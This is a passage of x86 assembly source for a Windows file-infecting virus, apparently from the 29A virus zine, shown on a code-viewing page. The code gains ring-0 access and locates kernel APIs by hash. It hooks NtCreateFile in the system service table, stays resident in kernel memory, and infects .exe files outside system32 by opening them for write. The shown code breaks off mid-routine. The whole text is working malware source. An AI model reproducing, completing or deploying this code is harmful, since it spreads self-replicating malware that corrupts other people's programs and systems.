📄 29a-7.003
字号:
addrVirtualLock dd 0
addrVirtualAlloc dd 0
addrVirtualUnlock dd 0
if DEBUG
addrOutputDebugStringA dd 0
addrGetLastError dd 0
addrExitProcess dd 0
endif
db 'ntdll.dl'
ntdll_hash_table equ this word
HASH16 <ZwOpenSection>,hsZwOpenSection
HASH16 <ZwClose>,hsZwClose
dw 0
ntdll_hash_addr equ this dword
addrZwOpenSection dd 0
addrZwClose dd 0
db 'ADVAPI32'
advapi_hash_table equ this word
HASH16 <GetSecurityInfo>,hsGetSecurityInfo
HASH16 <SetSecurityInfo>,hsSetSecurityInfo
HASH16 <SetEntriesInAclA>,hsSetEntriesInAclA
dw 0
advapi_hash_addr equ this dword
addrGetSecurityInfo dd 0
addrSetSecurityInfo dd 0
addrSetEntriesInAclA dd 0
Ring0Entry:
pushad
pushfd
cli
call ring0_ip
ring0_ip:
pop ebp
lea edi,[ebp+ntos_hash_table-8-ring0_ip]
xor edx,edx
mov dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx
mov ebx,80400000h
call search_api_addr
cmp dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx
jz ring0_ret
cld
mov eax,[edi+addrZwCreateFile-(ntos_hash_table-8)]
mov eax,[eax+1]
mov edx,[edi+addrKeServiceDescriptorTable-(ntos_hash_table-8)]
mov edx,[edx]
mov edi,[edx+eax*4]
mov ecx,[ebp+vir_mem-ring0_ip]
mov [ecx+OldNtCreateFile-_start],edi
mov byte ptr [ecx+IsBusy-_start],0
;Check whether residented
cmp dword ptr [edi+NewNtCreateFile_start-NewNtCreateFile],0e8fa9c60h
jz ring0_ret ;have residented
lea edi,[edx+eax*4]
push large 'KCUF';
push large MemSize
push large 0 ;NonPagedPool
call [ebp+addrExAllocatePoolWithTag-ring0_ip]
or eax,eax
jz ring0_ret
push edi
mov esi,87654321h
vir_mem equ $-4
push esi
mov edi,esi
lea esi,[ebp+_start-ring0_ip]
mov ecx,vir_first_blk_size
rep movsb
pop esi
mov edi,eax
push large VirSize
pop ecx
rep movsb
pop edi
add eax,NewNtCreateFile-_start
mov [edi],eax
ring0_ret:
popfd
popad
retf
db 'ntoskrnl'
ntos_hash_table equ this word
HASH16 <KeServiceDescriptorTable>,hsKeServiceDescriptorTable
HASH16 <ZwCreateFile>,hsZwCreateFile
HASH16 <ZwReadFile>,hsZwReadFile
HASH16 <ZwWriteFile>,hsZwWriteFile
HASH16 <ExAllocatePoolWithTag>,hsExAllocatePoolWithTag
HASH16 <ZwSetInformationFile>,hsZwSetInformationFile
HASH16 <ZwQueryInformationFile>,hsZwQueryInformationFile
HASH16 <ZwClose>,hsNtZwClose
dw 0
ntos_hash_addr equ this dword
eAccess equ $
addrKeServiceDescriptorTable dd 0
addrZwCreateFile dd 0
addrZwReadFile dd 0
addrZwWriteFile dd 0
addrExAllocatePoolWithTag dd 0
addrZwSetInformationFile dd 0
addrZwQueryInformationFile dd 0
addrNtZwClose dd 0
dd 0
;in--ebx is the base to search,edi->the hash table,include dll name
search_api_addr:
pushad
pushfd
call search_api_addr_ip
search_api_addr_ip:
pop ebp
push ebp
lea eax,[ebp+search_api_addr_seh-search_api_addr_ip]
push eax
xor ecx,ecx
push dword ptr fs:[ecx]
mov fs:[ecx],esp
sub ebx,10000h
search_api_addr_@1:
add ebx,10000h
;ntoskrnl can be rebased,and it's not certain whether can found it,so not to search too high address to avoid blue screen
cmp ebx,80500000h
ja short search_api_addr_seh_restore
cmp word ptr [ebx],'ZM'
jnz short search_api_addr_@1
mov eax,[ebx+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jnz short search_api_addr_@1
mov eax,[eax+78h]
add eax,ebx
mov edx,[eax+3*4]
add edx,ebx
mov ecx,[edi]
cmp dword ptr [edx],ecx
jnz short search_api_addr_@1
mov ecx,[edi+4]
cmp dword ptr [edx+4],ecx
jnz short search_api_addr_@1
search_api_addr_seh_restore:
xor ecx,ecx
POP DWord Ptr FS:[ecx] ; restore except chain
pop esi
pop esi
add edi,8
or ebx,ebx
jz short search_api_addr_ret
call find_all_exportfunc
search_api_addr_ret:
popfd
popad
retn
search_api_addr_seh:
call search_api_addr_seh_ip
search_api_addr_seh_ip:
pop eax
lea eax,[eax-(search_api_addr_seh_ip-search_api_addr_@1)]
seh_cont:
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
search_api_addr_end:
find_all_exportfunc:
cld
dec ecx
push eax
xor eax,eax
repnz scasw
not ecx
dec ecx
push ecx
push edi
rep stosd ;Clear all API address
pop edi
sub edi,4
pop ecx
pop eax
mov esi,[eax+8*4]
add esi,ebx ;esi->name RVA array
mov esi,[esi]
add esi,ebx
xor edx,edx
push ecx
find_exportfunc:
push ecx
find_exportfunc_1:
cmp edx,[eax+6*4]
pop ecx
jz short find_exportfunc_ret
push ecx
inc edx
push eax
call calc_hash16
push edi
std
mov ecx,[esp+3*4]
repnz scasw
pop edi
pop eax
jnz short find_exportfunc_1
push edx
dec edx
push edi
mov edi,[eax+9*4]
add edi,ebx ;edi->ordinal array
movzx edx,word ptr [edi+edx*2]
mov edi,[eax+7*4]
add edi,ebx ;edi->function RVA
mov edx,[edi+edx*4]
add edx,ebx
pop edi
mov [edi+ecx*4+4],edx
pop edx
pop ecx
loop find_exportfunc
find_exportfunc_ret:
pop ecx
retn
find_exportfunc_end:
calc_hash16:
;esi->string
push edx
push 0ffffffffh
pop edx
cld
load_character:
lodsb
or al, al
jz exit_calc_crc
xor dl, al
mov al, 8
crc_byte:
shr edx, 1
jnc loop_crc_byte
xor edx, HASH16FACTOR
loop_crc_byte:
dec al
jnz crc_byte
jmp load_character
exit_calc_crc:
xchg edx, eax
;now ax is the hash 16,esi->string after the NULL character after last string
pop edx
ret
calc_hash16_end:
vir_first_blk_size equ $-_start
NTEBP equ 10*4
NewNtCreateFile:
push large 12345678h
OldNtCreateFile equ $-4
NewNtCreateFile_start:
pushad
pushfd
cli
call NewNCF_IP_0
NewNCF_IP_0:
NewNCF_IP equ uninit_data
pop ebp
add ebp,NewNCF_IP-NewNCF_IP_0
mov al,0
IsBusy equ $-1
or al,al
jnz NewNCF_ret
inc byte ptr [ebp+IsBusy-NewNCF_IP]
cld
mov esi,[esp+NTEBP+4+2*4] ;POBJECT_ATTRIBUTES
mov ebx,[esi+2*4] ;ObjectName,UNICODE_STRING
movzx ecx,word ptr [ebx]
mov edx,[ebx+4] ;->string
or edx,edx
jz NewNCF_ret_1
or ecx,ecx
jz NewNCF_ret_1
mov eax,[edx+ecx-4]
call eax_to_lowcase
if DEBUG
cmp eax,00650021h ;is '!e'? ; if debug,only infect .e!e
else
cmp eax,00650078h ;is 'xe'?
endif
jnz NewNCF_ret_1
mov eax,[edx+ecx-8]
call eax_to_lowcase
cmp eax,0065002eh ;is '.e'?
jnz NewNCF_ret_1
;Check whether the path include '\system32',avoid infect system file
lea edi,[ebp+VirBuf-NewNCF_IP]
mov esi,edx
xor eax,eax
push ecx
push edi
UniToAnsi_1:
lodsw
call eax_to_lowcase
stosb
loop UniToAnsi_1
pop esi
pop ecx
ChkSystemLoop:
cmp dword [esi],'sys\'
jnz ChkSystemLoopNext
cmp dword [esi+4],'3met'
jz NewNCF_ret_1
ChkSystemLoopNext:
inc esi
loop ChkSystemLoop
xor eax,eax
push eax
push eax
push large 60h ;FILE_SYNCHRONOUS_IO_NONALERT or FILE_NON_DIRECTORY_FILE
push large 1 ;FILE_OPEN
push eax
push large 0a7h ;FileAttributes
push eax
lea ecx,[ebp+temp-NewNCF_IP]
push ecx ;IoStatusBlock
push dword ptr [esp+NTEBP+4+2*4+8*4] ;POBJECT_ATTRIBUTES
mov esi,ecx
push large 40100000h ;SYNCHRONIZE or GENERIC_WRITE
lea edi,[ebp+hHandle-NewNCF_IP]
push edi
call [ebp+addrZwCreateFile-NewNCF_IP]
or eax,eax
jnz NewNCF_ret_1
;Check file size
mov eax,STDPARAM
call GetFInfo
cmp dword ptr [ecx+12],0
jnz NewNCF_ret_1
mov eax,[ecx+8]
mov [ebp+FileLen-NewNCF_IP],eax
cmp eax,2000h ;<8K?
jc NewNCF_ret_1
xor eax,eax
push eax
push eax
push large BUFSIZE
lea ecx,[ebp+VirBuf-NewNCF_IP]
push ecx
push esi ;IoStatusBlock
mov esi,ecx
push eax
push eax
push eax
push dword ptr [edi]
call [ebp+addrZwReadFile-NewNCF_IP]
or eax,eax
jnz NewNCF_ret_2
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -